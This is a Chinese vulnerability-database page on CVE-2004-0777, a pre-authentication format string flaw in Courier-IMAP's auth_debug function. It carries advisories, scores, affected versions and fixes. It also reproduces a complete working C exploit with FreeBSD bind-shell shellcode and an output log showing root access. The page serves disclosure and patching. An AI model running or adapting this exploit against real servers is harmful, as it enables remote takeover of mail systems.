CVE-2004-0777
CVSS7.5
发布时间 :2004-10-20 00:00:00
修订时间 :2012-04-23 21:29:50
NMCOEPS    

[原文]Format string vulnerability in the auth_debug function in Courier-IMAP 1.6.0 through 2.2.1 and 3.x through 3.0.3, when login debugging (DEBUG_LOGIN) is enabled, allows remote attackers to execute arbitrary code.


[CNNVD]Courier-IMAP远程格式串漏洞(CNNVD-200410-063)

        Courier-IMAP是一款流行的IMAP/POP3服务器。
        Courier-IMAP 1.6.0至2.2.1版本和3.x至3.0.3版本中的auth_debug()函数存在格式串问题,远程攻击者可以利用这个漏洞以进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-134 []

- CPE (受影响的平台与产品)

cpe:/a:inter7:courier-imap:2.2.1
cpe:/a:inter7:courier-imap:2.1.1
cpe:/a:inter7:courier-imap:2.2.0
cpe:/a:inter7:courier-imap:2.0.0
cpe:/a:inter7:courier-imap:1.7
cpe:/a:inter7:courier-imap:1.6
cpe:/a:inter7:courier-imap:2.1.2
cpe:/a:inter7:courier-imap:2.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0777
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0777
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200410-063
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/17034
(VENDOR_ADVISORY)  XF  courierimap-authdebug-format-string(17034)
http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=131
(UNKNOWN)  IDEFENSE  20040818 Courier-IMAP Remote Format String Vulnerability
http://www.trustix.net/errata/2004/0043/
(UNKNOWN)  TRUSTIX  2004-0043
http://www.securityfocus.com/bid/10976
(UNKNOWN)  BID  10976
http://security.gentoo.org/glsa/glsa-200408-19.xml
(UNKNOWN)  GENTOO  GLSA-200408-19

- 漏洞信息

Courier-IMAP远程格式串漏洞
高危 格式化字符串
2004-10-20 00:00:00 2012-12-07 00:00:00
远程  
        Courier-IMAP是一款流行的IMAP/POP3服务器。
        Courier-IMAP 1.6.0至2.2.1版本和3.x至3.0.3版本中的auth_debug()函数存在格式串问题,远程攻击者可以利用这个漏洞以进程权限在系统上执行任意指令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 设置/usr/lib/courier-imap/etc/imapd配置文件,修改:
        'DEBUG_LOGIN'为'0'。
        厂商补丁:
        inter7
        ------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载Courier IMap 3.0.7版本:
        
        http://www.courier-mta.org/imap/

- 漏洞信息 (432)

Courier-IMAP <= 3.0.2-r1 auth_debug() Remote Format String Exploit (EDBID:432)
bsd remote
2004-09-02 Verified
143 ktha
N/A [点击下载]
/*
  courier-imap <= 3.0.2-r1 Remote Format String Vulnerability exploit
  
  Author: ktha at hush dot com
  
  Tested on FreeBSD 4.10-RELEASE with courier-imap-3.0.2
  
  Special thanks goes to andrewg for providing the FreeBSD box.
  
  Greetings: all the guys from irc pulltheplug com and irc netric org
  
  bash-2.05b$ ./sm00ny-courier_imap_fsx
  courier-imap <= 3.0.2-r1 Remote Format String Vulnerability exploit by ktha at hush dot com
  [*] Launching attack against 127.0.0.1:143
  [+] Got current ebp(5100): 0xbfbfb050
  [+] Got possible saved ebp(3281): 0xbfbfe390
  [+] Got possible write on the stack pointer(3293): 0xbfbfe3c0
  [+] Verifying...failed
  [+] Got possible saved ebp(3286): 0xbfbfe3a4
  [+] Got possible write on the stack pointer(3298): 0xbfbfe3d4
  [+] Verifying...failed
  [+] Got possible saved ebp(3287): 0xbfbfe3a8
  [+] Got possible write on the stack pointer(3299): 0xbfbfe3d8
  [+] Verifying...OK
  [+] Building fmt...done
  [+] Building shellcode...done
  [*] Using ret: 0x8057000
  [*] Using got of fprintf(): 0x804fefc
  [*] Checking for shell..
  uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
   
  N.B. 1. ret can be guessed ;)
     2. got, well.. that's a different story, it must be bruteforced
     3. "ce_number" & "se_number" can be set with some default values when running multiple times
  4. shell is usable for aprox 1 min
    
  [ Need a challenge ? ]
  [ Visit http://www.pulltheplug.com ]
  
*/

#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <string.h>
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>

#define BIGBUF 2048

#define IMAP_PORT 143

#define END_BRUTEFORCE_STACK 5500

#define TOP_STACK 0xbfc00000 /* FreeBSD */

#define START_BRUTEFORCE_SAVED_EBP 3000

#define JUNK 9

#define GAP_EBP_ESP 48

#define DUMMY_NUMBER 100


void die(int type, char *message) {
 if(type == 2)
 perror(message);
    else
     fprintf(stderr,"%s\n",message);
 exit(1);
}

int connect_to (char *host, int port){
 struct hostent *h;
 struct sockaddr_in c;
 int sock;

 if ((host == NULL) || (*host == (char) 0))
   die(1, "[-] Invalid hostname");

 if ((c.sin_addr.s_addr = inet_addr (host)) == -1){
   if ((h = gethostbyname (host)) == NULL)
  die(1, "[-] Cannot resolve host");
   memcpy ((char *) &c.sin_addr, (char *) h->h_addr, sizeof (c.sin_addr));
 }
 if ((sock = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
   die(2,"[-] Error creating socket:");
 c.sin_family = PF_INET;
 c.sin_port = htons (port);
 if (connect (sock, (struct sockaddr *) &c, sizeof (c)) == -1)
   die(2, "[-] Cannot connect: ");
 return sock;
}

void close_socket (int sock){
 shutdown (sock, 2);
 close (sock);
}

char *get_request(char *username, char *password){
 char *request = (char *)malloc(strlen(username)+strlen(password)+20);
 sprintf(request,"1 LOGIN \"%s\" \"%s\"\r\n",username, password);
 return request;
}

void send_data(int sock, char *request){
 int n;
 n = send (sock, request, strlen (request), 0);
 if (n != strlen (request)){
        close_socket (sock);
        die(1, "Error sending request\n");
 }
}


int get_ce_number(char *host, int port){
 int sock;
 int loop;
 char temp[BIGBUF];
 int l,n;
 char username[BIGBUF];
 char password[BIGBUF];
 char *request;
 
 for (loop = END_BRUTEFORCE_STACK;;loop--){
 sock = connect_to(host, port);
 n = recv (sock, temp, sizeof (temp), 0);
 sprintf(password,"sm00ny");
 sprintf(username,"%%%d$p",loop);
 request = get_request(username,password);
 send_data(sock,request);
 memset(temp,0,sizeof(temp));
 n = recv (sock, temp, sizeof (temp), 0);
 close_socket (sock);
 if (n > 0)
  break;
 }
 return loop;
}


int get_se_number(int start, int end, char *host, int port){
 int loop;
 char username[BIGBUF];
 char password[BIGBUF];
 char *request;
 int l,n;
 char temp[BIGBUF];
 int sock;
 if (!start)
 start = START_BRUTEFORCE_SAVED_EBP;
 for (loop = start; loop < end; loop++){
 sock = connect_to(host, port);
 n = recv (sock, temp, sizeof (temp), 0);
 sprintf(password,"sm00ny");
 sprintf(username,"%%%d$n",loop);
 request = get_request(username,password);
 send_data(sock,request);
 memset(temp,0,sizeof(temp));
 n = recv (sock, temp, sizeof (temp), 0);
 close_socket (sock);
 if (n > 0)
  break;
 }
 if (loop == end)
 return -1;
 
 return loop;
}





int verify_se_number(int write, unsigned long addy, int number, char *host, int port){
    char username[BIGBUF];
    char password[BIGBUF];
    char temp[BIGBUF];
    char *request;
    int n, sock;
    
    sock = connect_to(host, port);
    memset(temp,0,sizeof(temp));
    n = recv (sock, temp, sizeof (temp), 0);
    sprintf(password,"sm00ny");
    sprintf(username,"%%%uu%%%u$hn%%%u$hn", (addy & 0xffff) - JUNK, number, write);
    request = get_request(username,password);
    send_data(sock,request);
    memset(temp,0,sizeof(temp));
    n = recv (sock, temp, sizeof (temp), 0);
    close_socket (sock);
    if (n <= 0)
     return 0;
     
    sock = connect_to(host, port);
    memset(temp,0,sizeof(temp));
    n = recv (sock, temp, sizeof (temp), 0);
    sprintf(password,"sm00ny");
    sprintf(username,"%%%u$n%%%u$hn", number, write);
    request = get_request(username,password);
    send_data(sock,request);
    memset(temp,0,sizeof(temp));
    n = recv (sock, temp, sizeof (temp), 0);
    close_socket (sock);
    if (n > 0)
     return 0;
     
    return 1;
}
                                                                            
                                                                            
int *get_format_vector(unsigned long got_addy, unsigned long got, unsigned long ret){
 int i,j,sum,byte;
 int *vec = (int *)malloc(11 * sizeof(int));
 
 sum = JUNK;
 for (i=0; i<2; i++){
 for (j=0; j<2; j++){
  vec[2*(2 * i + j)] = (got_addy & 0xffff) - sum;
  while (vec[2*(2 * i + j)] <= 12)
  vec[2*(2 * i + j)] += 0x10000;
  sum += vec[2*(2 * i + j)];
  
  byte = ((got + 2 * i) >> (16*j)) & 0xffff;
  vec[2*(2 * i + j) + 1] = byte - sum;
  while (vec[2*(2 * i + j) + 1] <= 12)
  vec[2*(2 * i + j) + 1] += 0x10000;
  sum += vec[2*(2 * i + j) + 1];
  got_addy += 2;
 }
 }
 for (i=0; i<2; i++){
 byte = (ret >> (16*i)) & 0xffff;
 vec[8+i] = byte - sum;
 while (vec[8+i] <= 12)
  vec[8+i] += 0x10000;
 sum += vec[8+i];
 }
 
 return vec;
}

char *get_format_string(int *vec, int se_number, int write_number, int got_number){
 char *buf = (char *) malloc(BIGBUF);
 char smallbuf[256];
 int i;
 
 for (i=0; i<4; i++){
 sprintf(smallbuf ,"%%%uu%%%u$hn%%%uu%%%u$hn",vec[2*i],se_number,vec[2*i+1],write_number);
 strcat(buf,smallbuf);
 }
 for (i=0; i<2; i++){
 sprintf(smallbuf,"%%%uu%%%u$hn",vec[8 + i],got_number + i);
 strcat(buf,smallbuf);
 }
 return buf;
}


char *gen_shellcode (int gap){
 int size;
 char *p;
 char shellcode[] =
 /* Thanks ilja */
 "\x31\xc0\x31\xc9\x31\xd2\xb0\x61"
 "\x51\xb1\x06\x51\xb1\x01\x51\xb1"
 "\x02\x51\x8d\x0c\x24\x51\xcd\x80"
 "\xb1\x02\x31\xc9\x51\x51\x51\x80"
 "\xc1\x77\x66\x51\xb5\x02\x66\x51"
 "\x8d\x0c\x24\xb2\x10\x52\x51\x50"
 "\x8d\x0c\x24\x51\x89\xc2\x31\xc0"
 "\xb0\x68\xcd\x80\xb3\x01\x53\x52"
 "\x8d\x0c\x24\x51\x31\xc0\xb0\x6a"
 "\xcd\x80\x31\xc0\x50\x50\x52\x8d"
 "\x0c\x24\x51\x31\xc9\xb0\x1e\xcd"
 "\x80\x89\xc3\x53\x51\x31\xc0\xb0"
 "\x5a\xcd\x80\x41\x53\x51\x31\xc0"
 "\xb0\x5a\xcd\x80\x41\x53\x51\x31"
 "\xc0\xb0\x5a\xcd\x80\x31\xdb\x53"
 "\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
 "\x62\x69\x89\xe3\x31\xc0\x50\x54"
 "\x53\x50\xb0\x3b\xcd\x80\x31\xc0"
 "\xb0\x01\xcd\x80";
                                                                         
 
    size = strlen (shellcode);
 p = (char *) malloc (gap + 1);
 
 /* Some nops ;) */
 memset (p, 0x41, gap);
 
 memcpy (p + gap - size, shellcode, size + 1);
 return p;
}


void root(char *host) {
 fd_set rfds;
    int n;
    int sock;
    char buff[1024];
    
    sock = connect_to(host,30464);
    send(sock,"id;\n",4,0);
    while(1) {
     FD_ZERO(&rfds);
     FD_SET(0, &rfds);
        FD_SET(sock, &rfds);
        if(select(sock+1, &rfds, NULL, NULL, NULL) < 1)
         exit(0);
        if(FD_ISSET(0,&rfds)) {
         if( (n = read(0,buff,sizeof(buff))) < 1)
         exit(0);
         if( send(sock,buff,n,0) != n)
         exit(0);
        }
        if(FD_ISSET(sock,&rfds)) {
         if( (n = recv(sock,buff,sizeof(buff),0)) < 1)
         exit(0);
         write(1,buff,n);
        }
 }
}



main (int argc, char **argv) {
 char *host="127.0.0.1";
 int port = IMAP_PORT;
 int sock;
 
 char *temp1, *temp2;
 char *request;
 int *vec;
 
 int n,ok,i;
 
 unsigned long cur_ebp; // was 5100 on my box
 int ce_number = 0;
 unsigned long saved_ebp; // was 3287 on my box
 int se_number = 0;
 unsigned long write_addy;
 int write_number = 0;
 unsigned long got_addy;
 int got_number = 0;
 
 /* objdump -R /usr/lib/courier-imap/sbin/imaplogin | grep fprintf */
 unsigned long got = 0x0804fefc;
 /* heh.. it's up to you to find this one :P Just use your favourite mathod */
 unsigned long ret = 0x8057000;
  
 if (argc > 1)
  host = argv[1];

 printf("courier-imap <= 3.0.2-r1 Remote Format String Vulnerability exploit by ktha at hush dot com\n");
 
 printf("[*] Launching attack against %s:%d\n",host,port);
 
 if (ce_number == 0)
  ce_number = get_ce_number(host,port);
 cur_ebp = TOP_STACK - 4 * ce_number;
 
 got_number = DUMMY_NUMBER;
 got_addy = cur_ebp + 4 * (got_number - 1);
  
 printf("[+] Got current ebp(%d): %p\n",ce_number,cur_ebp);
 
 do{
  se_number = get_se_number(se_number,ce_number,host,port);
  if (se_number == -1)
  die(1,"[-] Failed to get a saved_ebp !");
  
  saved_ebp = cur_ebp + 4 * (se_number - 1);
  printf("[+] Got possible saved ebp(%d): %p\n",se_number,saved_ebp);
  
  write_addy = GAP_EBP_ESP + saved_ebp;
  write_number = (write_addy - cur_ebp) / 4 + 1;
 printf("[+] Got possible write on the stack pointer(%d): %p\n",write_number,write_addy);
  
  printf("[+] Verifying...");
  ok = verify_se_number(write_number,got_addy,se_number,host,port);
  if (ok)
  printf("OK\n");
  else {
  printf("failed\n");
  se_number++;
  }
 }while (!ok);
 
 printf("[+] Building fmt...");
 vec = get_format_vector(got_addy,got,ret);
 temp1 = get_format_string(vec,se_number,write_number,got_number);
 printf("done\n");
 
 printf("[+] Building shellcode...");
 temp2 = gen_shellcode(800);
 printf("done\n");
 
 printf("[*] Using ret: %p\n",ret);
 printf("[*] Using got of fprintf(): %p\n",got);
 
 request = get_request(temp1,temp2);
 
 sock = connect_to(host, port);
 send_data(sock,request);
 sleep(2);
 close_socket (sock);
 
 printf("[*] Checking for shell..\n");
 root(host);
}

// milw0rm.com [2004-09-02]
		

- 漏洞信息 (F34330)

sm00ny-courier_imap_fsx.c (PacketStormID:F34330)
2004-09-13 00:00:00
ktha  
exploit,remote,imap
freebsd
CVE-2004-0777
[点击下载]

courier-imap 3.0.2-r1 and below remote format string vulnerability exploit. Tested on FreeBSD 4.10-RELEASE with courier-imap-3.0.2.

- 漏洞信息 (F34098)

iDEFENSE Security Advisory 2004-08-18.t (PacketStormID:F34098)
2004-08-20 00:00:00
iDefense Labs  idefense.com
advisory,remote,arbitrary,imap
CVE-2004-0777
[点击下载]

iDEFENSE Security Advisory 08.18.04 - Remote exploitation of a format string vulnerability in Double Precision Inc.'s, Courier-IMAP daemon allows attackers to execute arbitrary code. The vulnerability specifically exists within the auth_debug() function defined in authlib/debug.c. Versions below 3.0.7 are affected.

Courier-IMAP Remote Format String Vulnerability 

iDEFENSE Security Advisory 08.18.04:


I. BACKGROUND

Courier-IMAP is an IMAP/POP3 mail server popular on sites utilizing
Qmail/Exim/Postfix. More information is available here:

    http://www.courier-mta.org/imap/
II. DESCRIPTION


Remote exploitation of a format string vulnerability in Double Precision
Inc.'s, Courier-IMAP daemon allows attackers to execute arbitrary code.
The vulnerability specifically exists within the auth_debug() function
defined in authlib/debug.c:


void auth_debug( const char *fmt, va_list ap ) {    
char    buf[DEBUG_MESSAGE_SIZE];    
int     i;    
int     len;    // print into buffer to be able to replace control and other     // unwanted chars.    vsnprintf( buf, DEBUG_MESSAGE_SIZE, fmt, ap );    len = strlen( buf );    // replace nonprintable chars by dot    for( i=0 ; i<len ; i++ )            if( !isprint(buf[i]) )                    buf[i] = '.';    // emit it    

fprintf( stderr, buf );   // <- Format String Vulnerability    
fprintf( stderr, "\n" );}The 'buf' variable utilized in the fprintf() call is attacker-controlled and can contain format string modifiers allowing an attacker to manipulate the stack and eventually execute arbitrary code.




III. ANALYSIS

Successful exploitation does not require authentication thereby allowing
any remote attacker to execute arbitrary code under the privileges of
the user that the IMAP daemon runs as. The vulnerable function
auth_debug() is only called if login debugging is enabled requiring that
the 'DEBUG_LOGIN' be set to either '1' or '2' in the imapd configuration 
file.

IV. DETECTION

iDEFENSE has confirmed the existence of this vulnerability in
Courier-IMAP, v2.2.1. It is reported that all versions of Courier-IMAP
from 1.6.0 to 2.2.1 inclusive are vulnerable.


V. WORKAROUND

Disable the login debugging option of Courier-IMAP. This can be
accomplished by setting 'DEBUG_LOGIN' to '0' in the configuration file
usually located at /usr/lib/courier-imap/etc/imapd.


VI. VENDOR RESPONSE

This issue has been resolved in the latest version of Courier IMAP
(v3.0.7). As well, the default setting of 'DEBUG_LOGIN' is '0'.


VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2004-0777 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.



VIII. DISCLOSURE TIMELINE

08/10/2004   Initial vendor contact
08/10/2004   iDEFENSE clients notified
08/11/2004   Initial vendor response
08/18/2004   Public disclosure



IX. CREDIT

An anonymous contributor is credited with discovering this
vulnerability.
Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp



X. LEGAL NOTICES

Copyright (c) 2004 iDEFENSE, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an as is condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.


    

- 漏洞信息

9013
Courier-IMAP debug.c auth_debug() Function Remote Format String
Remote / Network Access, Local / Remote, Context Dependent Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

Courier IMAP contains a flaw that may allow a malicious user to execute arbitrary code. The issue is triggered by a user being able to inject format strings into a 'buf' variable within fprintf(). It is possible that the flaw may allow a remote attacker to execute a format string attack resulting in a loss of confidentiality and/or integrity.

- 时间线

2004-08-18 2004-08-10
2004-08-18 Unknow

- 解决方案

Upgrade to version 3.0.7 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): set 'DEBUG_LOGIN' to '0' in the configuration file which is usually located in /usr/lib/courier-imap/etc/imapd.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Courier-IMAP Remote Format String Vulnerability
Input Validation Error 10976
Yes No
2004-08-18 12:00:00 2009-07-12 06:17:00
An anonymous person disclosed this vulnerability.

- 受影响的程序版本

Inter7 Courier-IMAP 3.0.2 r1
Inter7 Courier-IMAP 3.0.2
Inter7 Courier-IMAP 3.0.1
Inter7 Courier-IMAP 3.0 .0
Inter7 Courier-IMAP 2.2.1
Inter7 Courier-IMAP 2.2 .0
Inter7 Courier-IMAP 2.1.2
Inter7 Courier-IMAP 2.1.1
Inter7 Courier-IMAP 2.1
Inter7 Courier-IMAP 2.0 .0
Inter7 Courier-IMAP 1.7
Inter7 Courier-IMAP 1.6
Double Precision Incorporated Courier-IMAP 3.0.7

- 不受影响的程序版本

Double Precision Incorporated Courier-IMAP 3.0.7

- 漏洞讨论

Courier-IMAP is reported to be susceptible to a remote format string vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input before using it as the format specifier in a formatted printing function.

Successful exploitation of this issue will allow an attacker to execute arbitrary code on the affected computer with the privileges of the user that the IMAP daemon runs as. This vulnerability is exploitable prior to authentication.

Courier-IMAP versions 1.6.0 through to 2.2.1 are reported vulnerable. Other versions may also be vulnerable.

- 漏洞利用

Exploit code has been provided by ktha &lt;ktha@hush.com&gt;:

- 解决方案

The vendor has released version 3.0.7 of the software addressing this issue. Users of affected packages are urged to upgrade.

Gentoo has released an advisory (GLSA 200408-19) to address this issue. Please see the referenced advisory for more information. Gentoo users can update their computers by carrying out the following commands:

emerge sync
emerge -pv ">=net-mail/courier-imap-3.0.5"
emerge ">=net-mail/courier-imap-3.0.5"

Please see the referenced Gentoo advisory for more information.

Trustix Linux has released advisory TSL-2004-0043 dealing with this and other issues. Please see the referenced advisory for more information.


Inter7 Courier-IMAP 1.6

Inter7 Courier-IMAP 1.7

Inter7 Courier-IMAP 2.0 .0

Inter7 Courier-IMAP 2.1

Inter7 Courier-IMAP 2.1.1

Inter7 Courier-IMAP 2.1.2

Inter7 Courier-IMAP 2.2 .0

Inter7 Courier-IMAP 2.2.1

Inter7 Courier-IMAP 3.0 .0

Inter7 Courier-IMAP 3.0.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站